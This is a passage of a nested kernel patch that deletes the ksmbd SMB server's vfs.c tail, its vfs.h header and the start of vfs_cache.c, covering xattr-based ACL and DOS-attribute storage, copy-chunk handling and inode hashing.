+-	posix_acl_release(posix_acls);
+-	return smb_acl;
+-}
+-
+-int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+-			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd *pntsd, int len)
+-{
+-	int rc;
+-	struct ndr sd_ndr = {0}, acl_ndr = {0};
+-	struct xattr_ntacl acl = {0};
+-	struct xattr_smb_acl *smb_acl, *def_smb_acl = NULL;
+-	struct inode *inode = d_inode(dentry);
+-
+-	acl.version = 4;
+-	acl.hash_type = XATTR_SD_HASH_TYPE_SHA256;
+-	acl.current_time = ksmbd_UnixTimeToNT(current_time(inode));
+-
+-	memcpy(acl.desc, "posix_acl", 9);
+-	acl.desc_len = 10;
+-
+-	pntsd->osidoffset =
+-		cpu_to_le32(le32_to_cpu(pntsd->osidoffset) + NDR_NTSD_OFFSETOF);
+-	pntsd->gsidoffset =
+-		cpu_to_le32(le32_to_cpu(pntsd->gsidoffset) + NDR_NTSD_OFFSETOF);
+-	pntsd->dacloffset =
+-		cpu_to_le32(le32_to_cpu(pntsd->dacloffset) + NDR_NTSD_OFFSETOF);
+-
+-	acl.sd_buf = (char *)pntsd;
+-	acl.sd_size = len;
+-
+-	rc = ksmbd_gen_sd_hash(conn, acl.sd_buf, acl.sd_size, acl.hash);
+-	if (rc) {
+-		pr_err("failed to generate hash for ndr acl\n");
+-		return rc;
+-	}
+-
+-	smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
+-						 ACL_TYPE_ACCESS);
+-	if (S_ISDIR(inode->i_mode))
+-		def_smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
+-							     ACL_TYPE_DEFAULT);
+-
+-	rc = ndr_encode_posix_acl(&acl_ndr, user_ns, inode,
+-				  smb_acl, def_smb_acl);
+-	if (rc) {
+-		pr_err("failed to encode ndr to posix acl\n");
+-		goto out;
+-	}
+-
+-	rc = ksmbd_gen_sd_hash(conn, acl_ndr.data, acl_ndr.offset,
+-			       acl.posix_acl_hash);
+-	if (rc) {
+-		pr_err("failed to generate hash for ndr acl\n");
+-		goto out;
+-	}
+-
+-	rc = ndr_encode_v4_ntacl(&sd_ndr, &acl);
+-	if (rc) {
+-		pr_err("failed to encode ndr to posix acl\n");
+-		goto out;
+-	}
+-
+-	rc = ksmbd_vfs_setxattr(user_ns, dentry,
+-				XATTR_NAME_SD, sd_ndr.data,
+-				sd_ndr.offset, 0);
+-	if (rc < 0)
+-		pr_err("Failed to store XATTR ntacl :%d\n", rc);
+-
+-	kfree(sd_ndr.data);
+-out:
+-	kfree(acl_ndr.data);
+-	kfree(smb_acl);
+-	kfree(def_smb_acl);
+-	return rc;
+-}
+-
+-int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
+-			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd **pntsd)
+-{
+-	int rc;
+-	struct ndr n;
+-	struct inode *inode = d_inode(dentry);
+-	struct ndr acl_ndr = {0};
+-	struct xattr_ntacl acl;
+-	struct xattr_smb_acl *smb_acl = NULL, *def_smb_acl = NULL;
+-	__u8 cmp_hash[XATTR_SD_HASH_SIZE] = {0};
+-
+-	rc = ksmbd_vfs_getxattr(user_ns, dentry, XATTR_NAME_SD, &n.data);
+-	if (rc <= 0)
+-		return rc;
+-
+-	n.length = rc;
+-	rc = ndr_decode_v4_ntacl(&n, &acl);
+-	if (rc)
+-		goto free_n_data;
+-
+-	smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
+-						 ACL_TYPE_ACCESS);
+-	if (S_ISDIR(inode->i_mode))
+-		def_smb_acl = ksmbd_vfs_make_xattr_posix_acl(user_ns, inode,
+-							     ACL_TYPE_DEFAULT);
+-
+-	rc = ndr_encode_posix_acl(&acl_ndr, user_ns, inode, smb_acl,
+-				  def_smb_acl);
+-	if (rc) {
+-		pr_err("failed to encode ndr to posix acl\n");
+-		goto out_free;
+-	}
+-
+-	rc = ksmbd_gen_sd_hash(conn, acl_ndr.data, acl_ndr.offset, cmp_hash);
+-	if (rc) {
+-		pr_err("failed to generate hash for ndr acl\n");
+-		goto out_free;
+-	}
+-
+-	if (memcmp(cmp_hash, acl.posix_acl_hash, XATTR_SD_HASH_SIZE)) {
+-		pr_err("hash value diff\n");
+-		rc = -EINVAL;
+-		goto out_free;
+-	}
+-
+-	*pntsd = acl.sd_buf;
+-	if (acl.sd_size < sizeof(struct smb_ntsd)) {
+-		pr_err("sd size is invalid\n");
+-		goto out_free;
+-	}
+-
+-	(*pntsd)->osidoffset = cpu_to_le32(le32_to_cpu((*pntsd)->osidoffset) -
+-					   NDR_NTSD_OFFSETOF);
+-	(*pntsd)->gsidoffset = cpu_to_le32(le32_to_cpu((*pntsd)->gsidoffset) -
+-					   NDR_NTSD_OFFSETOF);
+-	(*pntsd)->dacloffset = cpu_to_le32(le32_to_cpu((*pntsd)->dacloffset) -
+-					   NDR_NTSD_OFFSETOF);
+-
+-	rc = acl.sd_size;
+-out_free:
+-	kfree(acl_ndr.data);
+-	kfree(smb_acl);
+-	kfree(def_smb_acl);
+-	if (rc < 0) {
+-		kfree(acl.sd_buf);
+-		*pntsd = NULL;
+-	}
+-
+-free_n_data:
+-	kfree(n.data);
+-	return rc;
+-}
+-
+-int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da)
+-{
+-	struct ndr n;
+-	int err;
+-
+-	err = ndr_encode_dos_attr(&n, da);
+-	if (err)
+-		return err;
+-
+-	err = ksmbd_vfs_setxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
+-				 (void *)n.data, n.offset, 0);
+-	if (err)
+-		ksmbd_debug(SMB, "failed to store dos attribute in xattr\n");
+-	kfree(n.data);
+-
+-	return err;
+-}
+-
+-int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da)
+-{
+-	struct ndr n;
+-	int err;
+-
+-	err = ksmbd_vfs_getxattr(user_ns, dentry, XATTR_NAME_DOS_ATTRIBUTE,
+-				 (char **)&n.data);
+-	if (err > 0) {
+-		n.length = err;
+-		if (ndr_decode_dos_attr(&n, da))
+-			err = -EINVAL;
+-		kfree(n.data);
+-	} else {
+-		ksmbd_debug(SMB, "failed to load dos attribute in xattr\n");
+-	}
+-
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_init_kstat() - convert unix stat information to smb stat format
+- * @p:          destination buffer
+- * @ksmbd_kstat:      ksmbd kstat wrapper
+- */
+-void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat)
+-{
+-	struct file_directory_info *info = (struct file_directory_info *)(*p);
+-	struct kstat *kstat = ksmbd_kstat->kstat;
+-	u64 time;
+-
+-	info->FileIndex = 0;
+-	info->CreationTime = cpu_to_le64(ksmbd_kstat->create_time);
+-	time = ksmbd_UnixTimeToNT(kstat->atime);
+-	info->LastAccessTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(kstat->mtime);
+-	info->LastWriteTime = cpu_to_le64(time);
+-	time = ksmbd_UnixTimeToNT(kstat->ctime);
+-	info->ChangeTime = cpu_to_le64(time);
+-
+-	if (ksmbd_kstat->file_attributes & FILE_ATTRIBUTE_DIRECTORY_LE) {
+-		info->EndOfFile = 0;
+-		info->AllocationSize = 0;
+-	} else {
+-		info->EndOfFile = cpu_to_le64(kstat->size);
+-		info->AllocationSize = cpu_to_le64(kstat->blocks << 9);
+-	}
+-	info->ExtFileAttributes = ksmbd_kstat->file_attributes;
+-
+-	return info;
+-}
+-
+-int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
+-				struct user_namespace *user_ns,
+-				struct dentry *dentry,
+-				struct ksmbd_kstat *ksmbd_kstat)
+-{
+-	u64 time;
+-	int rc;
+-
+-	generic_fillattr(user_ns, d_inode(dentry), ksmbd_kstat->kstat);
+-
+-	time = ksmbd_UnixTimeToNT(ksmbd_kstat->kstat->ctime);
+-	ksmbd_kstat->create_time = time;
+-
+-	/*
+-	 * set default value for the case that store dos attributes is not yes
+-	 * or that acl is disable in server's filesystem and the config is yes.
+-	 */
+-	if (S_ISDIR(ksmbd_kstat->kstat->mode))
+-		ksmbd_kstat->file_attributes = FILE_ATTRIBUTE_DIRECTORY_LE;
+-	else
+-		ksmbd_kstat->file_attributes = FILE_ATTRIBUTE_ARCHIVE_LE;
+-
+-	if (test_share_config_flag(work->tcon->share_conf,
+-				   KSMBD_SHARE_FLAG_STORE_DOS_ATTRS)) {
+-		struct xattr_dos_attrib da;
+-
+-		rc = ksmbd_vfs_get_dos_attrib_xattr(user_ns, dentry, &da);
+-		if (rc > 0) {
+-			ksmbd_kstat->file_attributes = cpu_to_le32(da.attr);
+-			ksmbd_kstat->create_time = da.create_time;
+-		} else {
+-			ksmbd_debug(VFS, "fail to load dos attribute.\n");
+-		}
+-	}
+-
+-	return 0;
+-}
+-
+-ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
+-				struct dentry *dentry, char *attr_name,
+-				int attr_name_len)
+-{
+-	char *name, *xattr_list = NULL;
+-	ssize_t value_len = -ENOENT, xattr_list_len;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
+-	if (xattr_list_len <= 0)
+-		goto out;
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-			name += strlen(name) + 1) {
+-		ksmbd_debug(VFS, "%s, len %zd\n", name, strlen(name));
+-		if (strncasecmp(attr_name, name, attr_name_len))
+-			continue;
+-
+-		value_len = ksmbd_vfs_xattr_len(user_ns, dentry, name);
+-		break;
+-	}
+-
+-out:
+-	kvfree(xattr_list);
+-	return value_len;
+-}
+-
+-int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
+-				size_t *xattr_stream_name_size, int s_type)
+-{
+-	char *type, *buf;
+-
+-	if (s_type == DIR_STREAM)
+-		type = ":$INDEX_ALLOCATION";
+-	else
+-		type = ":$DATA";
+-
+-	buf = kasprintf(GFP_KERNEL, "%s%s%s",
+-			XATTR_NAME_STREAM, stream_name,	type);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	*xattr_stream_name = buf;
+-	*xattr_stream_name_size = strlen(buf) + 1;
+-
+-	return 0;
+-}
+-
+-int ksmbd_vfs_copy_file_ranges(struct ksmbd_work *work,
+-			       struct ksmbd_file *src_fp,
+-			       struct ksmbd_file *dst_fp,
+-			       struct srv_copychunk *chunks,
+-			       unsigned int chunk_count,
+-			       unsigned int *chunk_count_written,
+-			       unsigned int *chunk_size_written,
+-			       loff_t *total_size_written)
+-{
+-	unsigned int i;
+-	loff_t src_off, dst_off, src_file_size;
+-	size_t len;
+-	int ret;
+-
+-	*chunk_count_written = 0;
+-	*chunk_size_written = 0;
+-	*total_size_written = 0;
+-
+-	if (!(src_fp->daccess & (FILE_READ_DATA_LE | FILE_EXECUTE_LE))) {
+-		pr_err("no right to read(%pD)\n", src_fp->filp);
+-		return -EACCES;
+-	}
+-	if (!(dst_fp->daccess & (FILE_WRITE_DATA_LE | FILE_APPEND_DATA_LE))) {
+-		pr_err("no right to write(%pD)\n", dst_fp->filp);
+-		return -EACCES;
+-	}
+-
+-	if (ksmbd_stream_fd(src_fp) || ksmbd_stream_fd(dst_fp))
+-		return -EBADF;
+-
+-	smb_break_all_levII_oplock(work, dst_fp, 1);
+-
+-	if (!work->tcon->posix_extensions) {
+-		for (i = 0; i < chunk_count; i++) {
+-			src_off = le64_to_cpu(chunks[i].SourceOffset);
+-			dst_off = le64_to_cpu(chunks[i].TargetOffset);
+-			len = le32_to_cpu(chunks[i].Length);
+-
+-			if (check_lock_range(src_fp->filp, src_off,
+-					     src_off + len - 1, READ))
+-				return -EAGAIN;
+-			if (check_lock_range(dst_fp->filp, dst_off,
+-					     dst_off + len - 1, WRITE))
+-				return -EAGAIN;
+-		}
+-	}
+-
+-	src_file_size = i_size_read(file_inode(src_fp->filp));
+-
+-	for (i = 0; i < chunk_count; i++) {
+-		src_off = le64_to_cpu(chunks[i].SourceOffset);
+-		dst_off = le64_to_cpu(chunks[i].TargetOffset);
+-		len = le32_to_cpu(chunks[i].Length);
+-
+-		if (src_off + len > src_file_size)
+-			return -E2BIG;
+-
+-		ret = vfs_copy_file_range(src_fp->filp, src_off,
+-					  dst_fp->filp, dst_off, len, 0);
+-		if (ret == -EOPNOTSUPP || ret == -EXDEV)
+-			ret = vfs_copy_file_range(src_fp->filp, src_off,
+-						  dst_fp->filp, dst_off, len,
+-						  COPY_FILE_SPLICE);
+-		if (ret < 0)
+-			return ret;
+-
+-		*chunk_count_written += 1;
+-		*total_size_written += ret;
+-	}
+-	return 0;
+-}
+-
+-void ksmbd_vfs_posix_lock_wait(struct file_lock *flock)
+-{
+-	wait_event(flock->fl_wait, !flock->fl_blocker);
+-}
+-
+-int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout)
+-{
+-	return wait_event_interruptible_timeout(flock->fl_wait,
+-						!flock->fl_blocker,
+-						timeout);
+-}
+-
+-void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock)
+-{
+-	locks_delete_block(flock);
+-}
+-
+-int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+-				 struct inode *inode)
+-{
+-	struct posix_acl_state acl_state;
+-	struct posix_acl *acls;
+-	int rc;
+-
+-	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+-		return -EOPNOTSUPP;
+-
+-	ksmbd_debug(SMB, "Set posix acls\n");
+-	rc = init_acl_state(&acl_state, 1);
+-	if (rc)
+-		return rc;
+-
+-	/* Set default owner group */
+-	acl_state.owner.allow = (inode->i_mode & 0700) >> 6;
+-	acl_state.group.allow = (inode->i_mode & 0070) >> 3;
+-	acl_state.other.allow = inode->i_mode & 0007;
+-	acl_state.users->aces[acl_state.users->n].uid = inode->i_uid;
+-	acl_state.users->aces[acl_state.users->n++].perms.allow =
+-		acl_state.owner.allow;
+-	acl_state.groups->aces[acl_state.groups->n].gid = inode->i_gid;
+-	acl_state.groups->aces[acl_state.groups->n++].perms.allow =
+-		acl_state.group.allow;
+-	acl_state.mask.allow = 0x07;
+-
+-	acls = posix_acl_alloc(6, GFP_KERNEL);
+-	if (!acls) {
+-		free_acl_state(&acl_state);
+-		return -ENOMEM;
+-	}
+-	posix_state_to_acl(&acl_state, acls->a_entries);
+-	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
+-	if (rc < 0)
+-		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
+-			    rc);
+-	else if (S_ISDIR(inode->i_mode)) {
+-		posix_state_to_acl(&acl_state, acls->a_entries);
+-		rc = set_posix_acl(user_ns, inode, ACL_TYPE_DEFAULT,
+-				   acls);
+-		if (rc < 0)
+-			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+-				    rc);
+-	}
+-	free_acl_state(&acl_state);
+-	posix_acl_release(acls);
+-	return rc;
+-}
+-
+-int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+-				struct inode *inode, struct inode *parent_inode)
+-{
+-	struct posix_acl *acls;
+-	struct posix_acl_entry *pace;
+-	int rc, i;
+-
+-	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+-		return -EOPNOTSUPP;
+-
+-	acls = get_acl(parent_inode, ACL_TYPE_DEFAULT);
+-	if (!acls)
+-		return -ENOENT;
+-	pace = acls->a_entries;
+-
+-	for (i = 0; i < acls->a_count; i++, pace++) {
+-		if (pace->e_tag == ACL_MASK) {
+-			pace->e_perm = 0x07;
+-			break;
+-		}
+-	}
+-
+-	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
+-	if (rc < 0)
+-		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
+-			    rc);
+-	if (S_ISDIR(inode->i_mode)) {
+-		rc = set_posix_acl(user_ns, inode, ACL_TYPE_DEFAULT,
+-				   acls);
+-		if (rc < 0)
+-			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
+-				    rc);
+-	}
+-	posix_acl_release(acls);
+-	return rc;
+-}
+diff --git a/fs/ksmbd/vfs.h b/fs/ksmbd/vfs.h
+deleted file mode 100644
+index 593059ca85112..0000000000000
+--- a/fs/ksmbd/vfs.h
++++ /dev/null
+@@ -1,167 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __KSMBD_VFS_H__
+-#define __KSMBD_VFS_H__
+-
+-#include <linux/file.h>
+-#include <linux/fs.h>
+-#include <linux/namei.h>
+-#include <uapi/linux/xattr.h>
+-#include <linux/posix_acl.h>
+-#include <linux/unicode.h>
+-
+-#include "smbacl.h"
+-#include "xattr.h"
+-
+-/*
+- * Enumeration for stream type.
+- */
+-enum {
+-	DATA_STREAM	= 1,	/* type $DATA */
+-	DIR_STREAM		/* type $INDEX_ALLOCATION */
+-};
+-
+-/* CreateOptions */
+-#define CREATE_TREE_CONNECTION			cpu_to_le32(0x00000080)
+-#define FILE_RESERVE_OPFILTER_LE		cpu_to_le32(0x00100000)
+-
+-#define CREATE_OPTION_READONLY			0x10000000
+-/* system. NB not sent over wire */
+-#define CREATE_OPTION_SPECIAL			0x20000000
+-
+-struct ksmbd_work;
+-struct ksmbd_file;
+-struct ksmbd_conn;
+-
+-struct ksmbd_dir_info {
+-	const char	*name;
+-	char		*wptr;
+-	char		*rptr;
+-	int		name_len;
+-	int		out_buf_len;
+-	int		num_entry;
+-	int		data_count;
+-	int		last_entry_offset;
+-	bool		hide_dot_file;
+-	int		flags;
+-	int		last_entry_off_align;
+-};
+-
+-struct ksmbd_readdir_data {
+-	struct dir_context	ctx;
+-	union {
+-		void		*private;
+-		char		*dirent;
+-	};
+-
+-	unsigned int		used;
+-	unsigned int		dirent_count;
+-	unsigned int		file_attr;
+-	struct unicode_map	*um;
+-};
+-
+-/* ksmbd kstat wrapper to get valid create time when reading dir entry */
+-struct ksmbd_kstat {
+-	struct kstat		*kstat;
+-	unsigned long long	create_time;
+-	__le32			file_attributes;
+-};
+-
+-int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
+-			  struct dentry *child);
+-int ksmbd_vfs_may_delete(struct user_namespace *user_ns, struct dentry *dentry);
+-int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
+-				   struct dentry *dentry, __le32 *daccess);
+-int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode);
+-int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode);
+-int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		   size_t count, loff_t *pos);
+-int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
+-		    char *buf, size_t count, loff_t *pos, bool sync,
+-		    ssize_t *written);
+-int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id);
+-int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name);
+-int ksmbd_vfs_link(struct ksmbd_work *work,
+-		   const char *oldname, const char *newname);
+-int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat);
+-int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			char *newname);
+-int ksmbd_vfs_truncate(struct ksmbd_work *work,
+-		       struct ksmbd_file *fp, loff_t size);
+-struct srv_copychunk;
+-int ksmbd_vfs_copy_file_ranges(struct ksmbd_work *work,
+-			       struct ksmbd_file *src_fp,
+-			       struct ksmbd_file *dst_fp,
+-			       struct srv_copychunk *chunks,
+-			       unsigned int chunk_count,
+-			       unsigned int *chunk_count_written,
+-			       unsigned int *chunk_size_written,
+-			       loff_t  *total_size_written);
+-ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list);
+-ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   char *xattr_name,
+-			   char **xattr_buf);
+-ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
+-				struct dentry *dentry, char *attr_name,
+-				int attr_name_len);
+-int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
+-		       struct dentry *dentry, const char *attr_name,
+-		       void *attr_value, size_t attr_size, int flags);
+-int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
+-				size_t *xattr_stream_name_size, int s_type);
+-int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry, char *attr_name);
+-int ksmbd_vfs_kern_path(struct ksmbd_work *work,
+-			char *name, unsigned int flags, struct path *path,
+-			bool caseless);
+-struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+-					  const char *name,
+-					  unsigned int flags,
+-					  struct path *path);
+-int ksmbd_vfs_empty_dir(struct ksmbd_file *fp);
+-void ksmbd_vfs_set_fadvise(struct file *filp, __le32 option);
+-int ksmbd_vfs_zero_data(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			loff_t off, loff_t len);
+-struct file_allocated_range_buffer;
+-int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
+-			 struct file_allocated_range_buffer *ranges,
+-			 unsigned int in_count, unsigned int *out_count);
+-int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+-		     struct dentry *dir, struct dentry *dentry);
+-void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat);
+-int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
+-				struct user_namespace *user_ns,
+-				struct dentry *dentry,
+-				struct ksmbd_kstat *ksmbd_kstat);
+-void ksmbd_vfs_posix_lock_wait(struct file_lock *flock);
+-int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout);
+-void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock);
+-int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+-				struct dentry *dentry);
+-int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+-			       struct dentry *dentry);
+-int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
+-			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd *pntsd, int len);
+-int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
+-			   struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   struct smb_ntsd **pntsd);
+-int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da);
+-int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
+-				   struct dentry *dentry,
+-				   struct xattr_dos_attrib *da);
+-int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
+-				 struct inode *inode);
+-int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
+-				struct inode *inode,
+-				struct inode *parent_inode);
+-#endif /* __KSMBD_VFS_H__ */
+diff --git a/fs/ksmbd/vfs_cache.c b/fs/ksmbd/vfs_cache.c
+deleted file mode 100644
+index 0ae5dd0829e92..0000000000000
+--- a/fs/ksmbd/vfs_cache.c
++++ /dev/null
+@@ -1,708 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- * Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <linux/vmalloc.h>
+-
+-#include "glob.h"
+-#include "vfs_cache.h"
+-#include "oplock.h"
+-#include "vfs.h"
+-#include "connection.h"
+-#include "mgmt/tree_connect.h"
+-#include "mgmt/user_session.h"
+-#include "smb_common.h"
+-
+-#define S_DEL_PENDING			1
+-#define S_DEL_ON_CLS			2
+-#define S_DEL_ON_CLS_STREAM		8
+-
+-static unsigned int inode_hash_mask __read_mostly;
+-static unsigned int inode_hash_shift __read_mostly;
+-static struct hlist_head *inode_hashtable __read_mostly;
+-static DEFINE_RWLOCK(inode_hash_lock);
+-
+-static struct ksmbd_file_table global_ft;
+-static atomic_long_t fd_limit;
+-static struct kmem_cache *filp_cache;
+-
+-void ksmbd_set_fd_limit(unsigned long limit)
+-{
+-	limit = min(limit, get_max_files());
+-	atomic_long_set(&fd_limit, limit);
+-}
+-
+-static bool fd_limit_depleted(void)
+-{
+-	long v = atomic_long_dec_return(&fd_limit);
+-
+-	if (v >= 0)
+-		return false;
+-	atomic_long_inc(&fd_limit);
+-	return true;
+-}
+-
+-static void fd_limit_close(void)
+-{
+-	atomic_long_inc(&fd_limit);
+-}
+-
+-/*
+- * INODE hash
+- */
+-
+-static unsigned long inode_hash(struct super_block *sb, unsigned long hashval)
+-{
+-	unsigned long tmp;
+-
+-	tmp = (hashval * (unsigned long)sb) ^ (GOLDEN_RATIO_PRIME + hashval) /
+-		L1_CACHE_BYTES;
+-	tmp = tmp ^ ((tmp ^ GOLDEN_RATIO_PRIME) >> inode_hash_shift);
+-	return tmp & inode_hash_mask;
+-}
+-
+-static struct ksmbd_inode *__ksmbd_inode_lookup(struct inode *inode)
+-{
+-	struct hlist_head *head = inode_hashtable +
+-		inode_hash(inode->i_sb, inode->i_ino);
+-	struct ksmbd_inode *ci = NULL, *ret_ci = NULL;
+-
+-	hlist_for_each_entry(ci, head, m_hash) {
+-		if (ci->m_inode == inode) {
+-			if (atomic_inc_not_zero(&ci->m_count))
+-				ret_ci = ci;
+-			break;
+-		}
+-	}
+-	return ret_ci;
+-}
+-
+-static struct ksmbd_inode *ksmbd_inode_lookup(struct ksmbd_file *fp)
+-{
+-	return __ksmbd_inode_lookup(file_inode(fp->filp));
+-}
+-
+-static struct ksmbd_inode *ksmbd_inode_lookup_by_vfsinode(struct inode *inode)
+-{
+-	struct ksmbd_inode *ci;
+-
+-	read_lock(&inode_hash_lock);
+-	ci = __ksmbd_inode_lookup(inode);
+-	read_unlock(&inode_hash_lock);
+-	return ci;
+-}
+-
+-int ksmbd_query_inode_status(struct inode *inode)
+-{
+-	struct ksmbd_inode *ci;
+-	int ret = KSMBD_INODE_STATUS_UNKNOWN;
+-
+-	read_lock(&inode_hash_lock);
+-	ci = __ksmbd_inode_lookup(inode);
+-	if (ci) {
+-		ret = KSMBD_INODE_STATUS_OK;
+-		if (ci->m_flags & S_DEL_PENDING)
+-			ret = KSMBD_INODE_STATUS_PENDING_DELETE;
+-		atomic_dec(&ci->m_count);
+-	}
+-	read_unlock(&inode_hash_lock);
+-	return ret;
+-}
+-
+-bool ksmbd_inode_pending_delete(struct ksmbd_file *fp)
+-{
+-	return (fp->f_ci->m_flags & S_DEL_PENDING);
+-}
+-
+-void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp)
+-{
+-	fp->f_ci->m_flags |= S_DEL_PENDING;
+-}
+-
+-void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp)
+-{
+-	fp->f_ci->m_flags &= ~S_DEL_PENDING;
+-}
+-
+-void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
+-				  int file_info)
+-{
+-	if (ksmbd_stream_fd(fp)) {
+-		fp->f_ci->m_flags |= S_DEL_ON_CLS_STREAM;
+-		return;
+-	}
+-
+-	fp->f_ci->m_flags |= S_DEL_ON_CLS;
+-}
+-
+-static void ksmbd_inode_hash(struct ksmbd_inode *ci)
+-{
+-	struct hlist_head *b = inode_hashtable +
+-		inode_hash(ci->m_inode->i_sb, ci->m_inode->i_ino);
+-
+-	hlist_add_head(&ci->m_hash, b);
+-}
+-
+-static void ksmbd_inode_unhash(struct ksmbd_inode *ci)
+-{
+-	write_lock(&inode_hash_lock);
+-	hlist_del_init(&ci->m_hash);
+-	write_unlock(&inode_hash_lock);
+-}
+-
+-static int ksmbd_inode_init(struct ksmbd_inode *ci, struct ksmbd_file *fp)
+-{
+-	ci->m_inode = file_inode(fp->filp);
+-	atomic_set(&ci->m_count, 1);
+-	atomic_set(&ci->op_count, 0);
+-	atomic_set(&ci->sop_count, 0);
+-	ci->m_flags = 0;
+-	ci->m_fattr = 0;
+-	INIT_LIST_HEAD(&ci->m_fp_list);
+-	INIT_LIST_HEAD(&ci->m_op_list);
+-	rwlock_init(&ci->m_lock);
+-	return 0;
+-}
+-
+-static struct ksmbd_inode *ksmbd_inode_get(struct ksmbd_file *fp)
+-{
+-	struct ksmbd_inode *ci, *tmpci;
+-	int rc;
+-
+-	read_lock(&inode_hash_lock);
+-	ci = ksmbd_inode_lookup(fp);
+-	read_unlock(&inode_hash_lock);
+-	if (ci)
+-		return ci;
+-
+-	ci = kmalloc(sizeof(struct ksmbd_inode), GFP_KERNEL);
+-	if (!ci)
+-		return NULL;
+-
+-	rc = ksmbd_inode_init(ci, fp);
+-	if (rc) {
+-		pr_err("inode initialized failed\n");
+-		kfree(ci);
+-		return NULL;
+-	}
+-
+-	write_lock(&inode_hash_lock);
+-	tmpci = ksmbd_inode_lookup(fp);
+-	if (!tmpci) {
+-		ksmbd_inode_hash(ci);
+-	} else {
+-		kfree(ci);
+-		ci = tmpci;
+-	}
+-	write_unlock(&inode_hash_lock);
+-	return ci;
+-}
+-
+-static void ksmbd_inode_free(struct ksmbd_inode *ci)
+-{
+-	ksmbd_inode_unhash(ci);
+-	kfree(ci);
+-}
+-
